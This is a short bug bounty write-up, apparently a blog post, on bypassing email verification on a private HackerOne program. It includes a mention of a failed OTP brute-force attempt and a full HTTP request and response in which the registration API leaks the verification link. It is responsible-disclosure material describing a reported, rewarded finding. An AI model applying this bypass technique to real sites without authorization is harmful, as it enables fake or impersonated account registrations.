How I was Able To Bypass Email Verification

Hello masters and learners, I hope you are doing well and always putting in the effort to secure the world so that no one can benefit unethically.

The main reason I am writing this article is that sometimes, when we lose hope, we just need to think outside the box.

While testing a private HackerOne (h1) program for some basic issues, I found that the site had an email verification mechanism. Its function is to send a 4-digit verification code (OTP) and an email link to the user-provided email address. I wondered how I could bypass it.

I tried to brute-force the verification code but failed: they had rate limiting in place, and I thought I would not be able to bypass it.

But wait, one more try: I went through the Burp HTTP request history and found an interesting request, the one used for adding an email.

Request:

POST /registerNewUser HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.site.com/login
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 171
Cookie: foo
DNT: 1
Connection: close

givenName=test&familyName=test&gender=0&email=test@gmail.com&tz=20&agreePrivAndTC=true&password=value&action=send-verification-web

I tried adding test@gmail.com as the email and was shocked when I viewed the response, because it leaked the verification link.

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Jun 2018 06:47:49 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 54
Connection: close
X-Powered-By: Express
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: -1
Pragma: no-cache
Access-Control-Allow-Origin: *
X-Frame-Options: SAMEORIGIN
ETag: W/"36-zOgjh98O1kXD4SR66HqUdT6UxdM"
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload

{"key":"the verification link","success":1}

After seeing the verification link, my feeling was:

I reported the issue and was rewarded a $200 bounty for it.
